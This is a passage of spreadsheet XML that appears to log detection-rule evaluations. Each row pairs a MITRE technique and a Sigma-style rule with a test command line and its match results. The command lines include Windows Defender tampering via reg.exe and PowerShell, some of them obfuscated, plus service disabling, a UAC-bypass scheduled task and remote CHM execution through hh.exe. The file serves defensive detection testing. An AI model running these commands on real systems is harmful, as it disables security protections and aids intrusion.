      </c>
      <c r="B2827" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2827" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2827" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2827" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; (Get-Command Remove-MpPreference) -ControlledFolderAccessProtectedFolders 'C:\'"</t>
        </is>
      </c>
      <c r="F2827" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2827" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2827" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2827" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE (48917adc-a28e-4f5d-b729-11e75da8941f)</t>
        </is>
      </c>
      <c r="J2827" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2827" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2828" ht="15.75" customHeight="1" s="42">
      <c r="A2828" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2828" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2828" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2828" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2828" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Expression 'Remove-MpPreference -ControlledFolderAccessProtectedFolders C:\'"</t>
        </is>
      </c>
      <c r="F2828" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2828" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2828" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2828" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2828" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2828" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2829" ht="15.75" customHeight="1" s="42">
      <c r="A2829" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2829" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2829" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2829" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2829" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { param($arg) Remove-MpPreference -ControlledFolderAccessProtectedFolders $arg } -arg 'C:\'"</t>
        </is>
      </c>
      <c r="F2829" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2829" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2829" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2829" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE (48917adc-a28e-4f5d-b729-11e75da8941f)</t>
        </is>
      </c>
      <c r="J2829" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2829" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2830" ht="15.75" customHeight="1" s="42">
      <c r="A2830" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2830" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2830" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2830" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2830" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {Set-Service -Name 'Spooler' -StartupType 'Disabled'}"</t>
        </is>
      </c>
      <c r="F2830" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2830" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2830" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2830" s="43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2830" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2830" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2831" ht="15.75" customHeight="1" s="42">
      <c r="A2831" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2831" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2831" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2831" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2831" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType Manual"</t>
        </is>
      </c>
      <c r="F2831" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2831" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2831" s="43" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel (023c654f-8f16-44d9-bb2b-00ff36a62af9)</t>
        </is>
      </c>
      <c r="J2831" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2831" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2832" ht="15.75" customHeight="1" s="42">
      <c r="A2832" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2832" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2832" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2832" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2832" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'Spooler' -StartupType 'Disabled'"</t>
        </is>
      </c>
      <c r="F2832" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2832" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2832" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2832" s="43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2832" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2832" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2833" ht="15.75" customHeight="1" s="42">
      <c r="A2833" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2833" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2833" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2833" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2833" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType 'Dis'+'abled"</t>
        </is>
      </c>
      <c r="F2833" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2833" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2833" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2833" s="43" t="inlineStr">
        <is>
          <t>Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc); Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc)</t>
        </is>
      </c>
      <c r="J2833" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2833" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2834" ht="15.75" customHeight="1" s="42">
      <c r="A2834" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2834" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2834" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2834" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2834" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType [char]68+[char]105+[char]115+[char]97+[char]98+[char]108+[char]101+[char]100"</t>
        </is>
      </c>
      <c r="F2834" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2834" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2834" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2834" s="43" t="inlineStr">
        <is>
          <t>Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc)</t>
        </is>
      </c>
      <c r="J2834" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2834" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2835" ht="15.75" customHeight="1" s="42">
      <c r="A2835" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2835" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_cleanwipe</t>
        </is>
      </c>
      <c r="C2835" s="43" t="inlineStr">
        <is>
          <t>PUA - CleanWipe Execution</t>
        </is>
      </c>
      <c r="D2835" s="43" t="inlineStr">
        <is>
          <t>f44800ac-38ec-471f-936e-3fa7d9c53100</t>
        </is>
      </c>
      <c r="E2835" s="43" t="inlineStr">
        <is>
          <t>WFPUnins.exe /uninstall /enterprise</t>
        </is>
      </c>
      <c r="F2835" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2835" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2835" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2835" s="43" t="inlineStr">
        <is>
          <t>Taskkill Symantec Endpoint Protection (4a6713f6-3331-11ed-a261-0242ac120002); Taskkill Symantec Endpoint Protection (4a6713f6-3331-11ed-a261-0242ac120002)</t>
        </is>
      </c>
      <c r="J2835" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2835" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2836" ht="15.75" customHeight="1" s="42">
      <c r="A2836" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2836" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C2836" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2836" s="43" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E2836" s="43" t="inlineStr">
        <is>
          <t>reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\Defender\Exclusions\Paths /v C:\\Evil /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2836" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2836" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2836" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2836" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Suspension via WERFaultSecure through EDR-Freeze (1f0b4cac-9c81-41f4-95d0-8475ff46b3e2)</t>
        </is>
      </c>
      <c r="J2836" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2836" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2837" ht="15.75" customHeight="1" s="42">
      <c r="A2837" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2837" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C2837" s="43" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D2837" s="43" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E2837" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v Start /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2837" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2837" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2837" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2837" s="43" t="inlineStr">
        <is>
          <t>Potential Product Reconnaissance Via Wmic.EXE (15434e33-5027-4914-88d5-3d4145ec25a9); Application Removed Via Wmic.EXE (b53317a0-8acf-4fd1-8de8-a5401e776b96)</t>
        </is>
      </c>
      <c r="J2837" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2837" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2838" ht="15.75" customHeight="1" s="42">
      <c r="A2838" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2838" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C2838" s="43" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D2838" s="43" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E2838" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2838" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2838" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2838" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2838" s="43" t="inlineStr">
        <is>
          <t>Potential Product Reconnaissance Via Wmic.EXE (15434e33-5027-4914-88d5-3d4145ec25a9); Application Removed Via Wmic.EXE (b53317a0-8acf-4fd1-8de8-a5401e776b96)</t>
        </is>
      </c>
      <c r="J2838" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2838" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2839" ht="15.75" customHeight="1" s="42">
      <c r="A2839" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2839" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_disable_defender_wmi_autologger</t>
        </is>
      </c>
      <c r="C2839" s="43" t="inlineStr">
        <is>
          <t>Disabling Windows Defender WMI Autologger Session via Reg.exe</t>
        </is>
      </c>
      <c r="D2839" s="43" t="inlineStr">
        <is>
          <t>a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6</t>
        </is>
      </c>
      <c r="E2839" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v Start /t REG_DWORD /d 0x0 /f</t>
        </is>
      </c>
      <c r="F2839" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2839" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2839" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2839" s="43" t="inlineStr">
        <is>
          <t>Potential Product Reconnaissance Via Wmic.EXE (15434e33-5027-4914-88d5-3d4145ec25a9); Application Removed Via Wmic.EXE (b53317a0-8acf-4fd1-8de8-a5401e776b96)</t>
        </is>
      </c>
      <c r="J2839" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2839" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2840" ht="15.75" customHeight="1" s="42">
      <c r="A2840" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2840" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_windows_defender_tamper</t>
        </is>
      </c>
      <c r="C2840" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Registry Key Tampering Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2840" s="43" t="inlineStr">
        <is>
          <t>452bce90-6fb0-43cc-97a5-affc283139b3</t>
        </is>
      </c>
      <c r="E2840" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2840" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2840" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2840" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2840" s="43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J2840" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2840" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2841" ht="15.75" customHeight="1" s="42">
      <c r="A2841" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2841" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_windows_defender_tamper</t>
        </is>
      </c>
      <c r="C2841" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Registry Key Tampering Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2841" s="43" t="inlineStr">
        <is>
          <t>452bce90-6fb0-43cc-97a5-affc283139b3</t>
        </is>
      </c>
      <c r="E2841" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Microsoft\Windows\Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2841" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2841" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2841" s="43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J2841" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2841" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2842" ht="15.75" customHeight="1" s="42">
      <c r="A2842" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2842" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C2842" s="43" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D2842" s="43" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E2842" s="43" t="inlineStr">
        <is>
          <t>deviceenroller.exe -PhoneDeepLink</t>
        </is>
      </c>
      <c r="F2842" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2842" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2842" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2842" s="43" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE (e173ad47-4388-4012-ae62-bd13f71c18a8)</t>
        </is>
      </c>
      <c r="J2842" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2842" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2843" ht="15.75" customHeight="1" s="42">
      <c r="A2843" s="43" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B2843" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C2843" s="43" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D2843" s="43" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E2843" s="43" t="inlineStr">
        <is>
          <t>deviceenroller.exe /Phone""DeepLink</t>
        </is>
      </c>
      <c r="F2843" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2843" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2843" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2843" s="43" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE (e173ad47-4388-4012-ae62-bd13f71c18a8)</t>
        </is>
      </c>
      <c r="J2843" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2843" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2844" ht="15.75" customHeight="1" s="42">
      <c r="A2844" s="43" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B2844" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C2844" s="43" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D2844" s="43" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E2844" s="43" t="inlineStr">
        <is>
          <t>dllhost.exe</t>
        </is>
      </c>
      <c r="F2844" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2844" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2844" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2844" s="43" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly (e7888eb1-13b0-4616-bd99-4bc0c2b054b9)</t>
        </is>
      </c>
      <c r="J2844" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2844" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2845" ht="15.75" customHeight="1" s="42">
      <c r="A2845" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2845" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C2845" s="43" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D2845" s="43" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E2845" s="43" t="inlineStr">
        <is>
          <t>schtasks /create /tr "explorer.exe /NOUACCHECK" /sc once /st 12:00 /tn "TestUACBypass"</t>
        </is>
      </c>
      <c r="F2845" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2845" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2845" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2845" s="43" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag (534f2ef7-e8a2-4433-816d-c91bccde289b)</t>
        </is>
      </c>
      <c r="J2845" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2845" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2846" ht="15.75" customHeight="1" s="42">
      <c r="A2846" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2846" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C2846" s="43" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D2846" s="43" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E2846" s="43" t="inlineStr">
        <is>
          <t>schtasks /create /tn "TestUACBypass" /tr "explorer.exe /NOUACCHECK" /st 12:00 /sc once</t>
        </is>
      </c>
      <c r="F2846" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2846" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2846" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2846" s="43" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag (534f2ef7-e8a2-4433-816d-c91bccde289b)</t>
        </is>
      </c>
      <c r="J2846" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2846" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2847" ht="15.75" customHeight="1" s="42">
      <c r="A2847" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B2847" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C2847" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D2847" s="43" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E2847" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NonI -WindowStyle Hidden -NoProfile -Command '$x=$((gp HKCU:\Software\Microsoft\Windows\Update).Update)'</t>
        </is>
      </c>
      <c r="F2847" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2847" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2847" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2847" s="43" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag (534f2ef7-e8a2-4433-816d-c91bccde289b)</t>
        </is>
      </c>
      <c r="J2847" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2847" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2848" ht="15.75" customHeight="1" s="42">
      <c r="A2848" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2848" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C2848" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2848" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E2848" s="43" t="inlineStr">
        <is>
          <t>hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm</t>
        </is>
      </c>
      <c r="F2848" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2848" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2848" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2848" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2848" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2848" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2849" ht="15.75" customHeight="1" s="42">
      <c r="A2849" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2849" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C2849" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2849" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E2849" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\hh.exe" C:\Windows\IME\IMETC\HELP\IMTCTC14.CHM</t>
        </is>
      </c>
      <c r="F2849" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2849" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2849" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2849" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2849" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2849" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2850" ht="15.75" customHeight="1" s="42">
      <c r="A2850" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2850" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C2850" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2850" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E2850" s="43" t="inlineStr">
        <is>
          <t>copy hh.exe calc.exe &amp;&amp; calc.exe C:\Users\Public\legit.chm</t>
        </is>
      </c>
      <c r="F2850" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2850" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2850" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2850" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2850" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2850" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2851" ht="15.75" customHeight="1" s="42">
      <c r="A2851" s="43" t="inlineStr">
        <is>
